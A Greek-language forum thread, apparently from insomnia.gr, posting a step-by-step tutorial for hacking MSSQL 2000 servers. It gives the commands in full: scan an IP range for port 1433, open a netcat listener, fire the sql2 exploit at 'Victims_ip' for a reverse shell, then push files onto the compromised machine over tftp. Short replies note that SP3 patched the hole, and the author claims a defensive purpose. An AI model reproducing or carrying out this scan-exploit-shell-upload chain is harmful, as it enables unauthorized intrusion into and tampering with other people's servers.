MSSQL 2000 server Hacking Tutorial sql2 vulnerabil

[chrispen]

Hello ,

Προγράμματα που θα χρειαστούμε :

To sfind (http://sw_sun.myetang.com/my/sfind1.85.zip ) εναν tftp server . Εγώ προτείνω τον Solarwinds (http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/ )

και τα sql2.exe netcat (nc.exe) και τα δύο θα τα βρείτε στην packetstorm.

 

1.Παίρνουμε το sfind και το τρέχουμε απο το command για να ψάξει για ips με sql database .

sfind -p 1433 1.0.0.1 1.0.0.255

Aυτό θα μας δώσει τις ips που έχουνε sql database

2.Ανοίγουμε ενα command και τρέχουμε το nc.exe με ανοιχτό το port 53

nc -l -p 53

3. Τρέχουμε κάθε ip που βρήκαμε με το sfind με το sql2 :

sql2 Victims_ip your_ip 53 0

ή

sql2 Victims_ip your_ip 53 1

 

Το 0 είναι για το mssql 2000 χωρίς service pack ενώ το 1 είναι για τα service packs 1 και 2

4. Εάν πετύχει τότε στο παράθυρο του nc θα έχουμε μπεί στο c:\winnt\system32 είναι το dos περιβάλλον του άλλου pc.

5. Ανοίγουμε το tftp server και δίνουμε στο sqlexec τα commands :

tftp -i thn_ip_mas get index.html c:\index.html

 

ώπου c:\index.html το σημείο στο οποίο θέλουμε να ανεβάσουμε το index.html

Όταν θα γίνει η εγκατάσταση του tftp server δημιουργεί ενα directory στο c:\ που λέγεται tftp-root εκεί βάζουμε τα αρχεία που θέλουμε να ανεβάσουμε.

 

 

Αυτα!!!

chrispen

[email protected]

θα με βρείτε στο grnet.

Eλπίζω να το έκανα αρκετά κατανοητό.

Expect More

[apoc]

Αντιστοιχη απαντηση και με το προηγουμενο ποστ..να πω οτι η συγκεκριμενη τρυπα εχει κλεισει με το SP3!

 

[chrispen]

'Οποιος ξέρει να ψάξει θα βρεί και για sp3 vulnerability. Τα πόστς έγιναν για να ελεγχθούν τα δικά σας μηχανήματα.

[Επισκέπτης]

Και τι σχέση έχει με το Hardware; <img src="http://www.insomnia.gr/ubbthreads/images/graemlins/mad.gif" alt="" />

[DeCoN]

Ti psaxneis na breis? <img src="http://www.insomnia.gr/ubbthreads/images/graemlins/wink.gif" alt="" />

U know ksefrago ampeli? <img src="http://www.insomnia.gr/ubbthreads/images/graemlins/tongue.gif" alt="" />